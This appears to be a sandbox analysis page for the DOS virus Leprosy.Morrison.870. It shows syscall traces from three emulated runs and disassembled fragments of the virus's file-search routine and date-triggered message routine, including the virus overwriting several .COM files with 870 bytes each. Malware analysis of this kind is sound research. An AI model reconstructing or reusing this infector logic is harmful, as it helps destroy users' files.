Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Morrison.870

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:40:02.462138936Z 44 PC: 12c95 | Get time 0x12c95: cmp byte ptr [0x106], 0
0x12c9a: je 0x12ca1
0x12c9c: cmp dh, 0xf
0x12c9f: jg 0x12caa
0x12ca1: cmp dl, 0
0x12ca4: je 0x12c91
0x12ca6: mov byte ptr [0x106], dl
0x12caa: mov byte ptr [0x295], 4
0x12caf: mov byte ptr [0x29e], 0
0x12cb4: mov cx, 0x27
0x12cb7: mov dx, 0x20a
0x12cba: mov ah, 0x4e
0x12cbc: int 0x21
0x12cbe: cmp ax, 0x12
0x12cc1: je 0x12cc6
0x12cc3: call 0x12ce8
0x12cc6: mov cx, 0x27
0x12cc9: mov dx, 0x210
0x12ccc: mov ah, 0x4e
0x12cce: int 0x21
2018-12-17T22:40:02.46494588Z 78 PC: 12cbe | Find first file
2018-12-17T22:40:02.471189308Z 78 PC: 12cd0 | Find first file
2018-12-17T22:40:02.477347454Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.496795511Z 61 PC: 12d03 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:02.503401931Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.509740966Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.511676594Z 61 PC: 12d4b | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:02.518729047Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.527011238Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.534773567Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.539796436Z 79 PC: 12d32 | Find next file
2018-12-17T22:40:02.542671793Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.555576569Z 61 PC: 12d03 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:40:02.562757544Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.568995917Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.570913861Z 61 PC: 12d4b | Open file (Filename = 'PRINT.COM')
2018-12-17T22:40:02.57826756Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.586385991Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.594185794Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.599551572Z 79 PC: 12d32 | Find next file
2018-12-17T22:40:02.601999084Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.613735904Z 61 PC: 12d03 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:40:02.621612669Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.628538217Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.630324507Z 61 PC: 12d4b | Open file (Filename = 'HELLO.COM')
2018-12-17T22:40:02.642039335Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.650488781Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.658336393Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.66344121Z 79 PC: 12d32 | Find next file
2018-12-17T22:40:02.66594517Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.67553383Z 61 PC: 12d03 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:40:02.687658856Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.694394691Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.696610356Z 61 PC: 12d4b | Open file (Filename = 'PHANG.COM')
2018-12-17T22:40:02.704941853Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.712938933Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.720719022Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.726099122Z 42 PC: 12d7b | Get date 0x12d7b: cmp dh, 3
0x12d7e: je 0x12d86
0x12d80: jmp 0x12d9b
0x12d82: nop
0x12d83: jmp 0x12da2
0x12d85: nop
0x12d86: mov ah, 9
0x12d88: mov dx, 0x228
0x12d8b: int 0x21
0x12d8d: mov dx, 0x24d
0x12d90: int 0x21
0x12d92: mov dx, 0x269
0x12d95: int 0x21
0x12d97: mov ah, 0x4c
0x12d99: int 0x21
0x12d9b: mov ah, 9
0x12d9d: mov dx, 0x219
0x12da0: int 0x21
0x12da2: mov ah, 0x4c
0x12da4: int 0x21
2018-12-17T22:40:02.728125458Z 9 PC: 12da2 | Display string (String= 'Stack overflow')
2018-12-17T22:40:02.730610069Z 76 PC: 12da6 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6905,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:33.487036444Z 44 PC: 12c95 | Get time 0x12c95: cmp byte ptr [0x106], 0
0x12c9a: je 0x12ca1
0x12c9c: cmp dh, 0xf
0x12c9f: jg 0x12caa
0x12ca1: cmp dl, 0
0x12ca4: je 0x12c91
0x12ca6: mov byte ptr [0x106], dl
0x12caa: mov byte ptr [0x295], 4
0x12caf: mov byte ptr [0x29e], 0
0x12cb4: mov cx, 0x27
0x12cb7: mov dx, 0x20a
0x12cba: mov ah, 0x4e
0x12cbc: int 0x21
0x12cbe: cmp ax, 0x12
0x12cc1: je 0x12cc6
0x12cc3: call 0x12ce8
0x12cc6: mov cx, 0x27
0x12cc9: mov dx, 0x210
0x12ccc: mov ah, 0x4e
0x12cce: int 0x21
2018-12-25T12:00:33.489818889Z 78 PC: 12cbe | Find first file
2018-12-25T12:00:33.495391355Z 78 PC: 12cd0 | Find first file
2018-12-25T12:00:33.501421043Z 67 PC: 12cfd | Get or set file attributes
2018-12-25T12:00:33.527034306Z 61 PC: 12d03 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.533987391Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-25T12:00:33.540841934Z 62 PC: 12d42 | Close file
2018-12-25T12:00:33.543524786Z 61 PC: 12d4b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.550762312Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-25T12:00:33.557684598Z 62 PC: 12d69 | Close file
2018-12-25T12:00:33.564272595Z 67 PC: 12d76 | Get or set file attributes
2018-12-25T12:00:33.574651422Z 79 PC: 12d32 | Find next file
2018-12-25T12:00:33.577017699Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.586334548Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.597960353Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.602358045Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.603761058Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.608831098Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.615120311Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.622049035Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.628473374Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.63153479Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.640987269Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.652997702Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.659495444Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.662783412Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.671171796Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.679463557Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.68716407Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.692753307Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.696079027Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.705371503Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.711965337Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.718636005Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.720383431Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.732553617Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.741948506Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.749819404Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.754499748Z 42 PC: 12d7b | Get date 0x12d7b: cmp dh, 3
0x12d7e: je 0x12d86
0x12d80: jmp 0x12d9b
0x12d82: nop
0x12d83: jmp 0x12da2
0x12d85: nop
0x12d86: mov ah, 9
0x12d88: mov dx, 0x228
0x12d8b: int 0x21
0x12d8d: mov dx, 0x24d
0x12d90: int 0x21
0x12d92: mov dx, 0x269
0x12d95: int 0x21
0x12d97: mov ah, 0x4c
0x12d99: int 0x21
0x12d9b: mov ah, 9
0x12d9d: mov dx, 0x219
0x12da0: int 0x21
0x12da2: mov ah, 0x4c
0x12da4: int 0x21
2018-12-25T12:00:33.757460849Z 9 PC: 12da2 | Display string (String= 'Stack overflow')
2018-12-25T12:00:33.759974017Z 76 PC: 12da6 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6905,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:33.586642669Z 44 PC: 12c95 | Get time 0x12c95: cmp byte ptr [0x106], 0
0x12c9a: je 0x12ca1
0x12c9c: cmp dh, 0xf
0x12c9f: jg 0x12caa
0x12ca1: cmp dl, 0
0x12ca4: je 0x12c91
0x12ca6: mov byte ptr [0x106], dl
0x12caa: mov byte ptr [0x295], 4
0x12caf: mov byte ptr [0x29e], 0
0x12cb4: mov cx, 0x27
0x12cb7: mov dx, 0x20a
0x12cba: mov ah, 0x4e
0x12cbc: int 0x21
0x12cbe: cmp ax, 0x12
0x12cc1: je 0x12cc6
0x12cc3: call 0x12ce8
0x12cc6: mov cx, 0x27
0x12cc9: mov dx, 0x210
0x12ccc: mov ah, 0x4e
0x12cce: int 0x21
2018-12-25T12:00:33.58946695Z 78 PC: 12cbe | Find first file
2018-12-25T12:00:33.595378993Z 78 PC: 12cd0 | Find first file
2018-12-25T12:00:33.601396405Z 67 PC: 12cfd | Get or set file attributes
2018-12-25T12:00:33.616647744Z 61 PC: 12d03 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.623233232Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-25T12:00:33.629350037Z 62 PC: 12d42 | Close file
2018-12-25T12:00:33.631168767Z 61 PC: 12d4b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.643175319Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-25T12:00:33.651616213Z 62 PC: 12d69 | Close file
2018-12-25T12:00:33.659679149Z 67 PC: 12d76 | Get or set file attributes
2018-12-25T12:00:33.664792761Z 79 PC: 12d32 | Find next file
2018-12-25T12:00:33.66736496Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.677440885Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.684541538Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.69078796Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.69250204Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.705798892Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.714342329Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.722329738Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.727747113Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.734895168Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.744514203Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.752278552Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.759597762Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.762084051Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.778631688Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.787215328Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.795311361Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.800822265Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.80421511Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.814050367Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.821134088Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.831169277Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.833274499Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.845189733Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.853841953Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.86209994Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.867033577Z 42 PC: 12d7b | Get date 0x12d7b: cmp dh, 3
0x12d7e: je 0x12d86
0x12d80: jmp 0x12d9b
0x12d82: nop
0x12d83: jmp 0x12da2
0x12d85: nop
0x12d86: mov ah, 9
0x12d88: mov dx, 0x228
0x12d8b: int 0x21
0x12d8d: mov dx, 0x24d
0x12d90: int 0x21
0x12d92: mov dx, 0x269
0x12d95: int 0x21
0x12d97: mov ah, 0x4c
0x12d99: int 0x21
0x12d9b: mov ah, 9
0x12d9d: mov dx, 0x219
0x12da0: int 0x21
0x12da2: mov ah, 0x4c
0x12da4: int 0x21
2018-12-25T12:00:33.870294204Z 9 PC: 12d8d | Display string (String= ' Jim Morrison...portami con te...')
2018-12-25T12:00:33.875795446Z 9 PC: 12d92 | Display string (String= ' nelle tue tenebre')
2018-12-25T12:00:33.880359108Z 9 PC: 12d97 | Display string (String= ' (CJ '72)')
2018-12-25T12:00:33.886577776Z 76 PC: 12d9b | Terminate with return code (Return code = '36')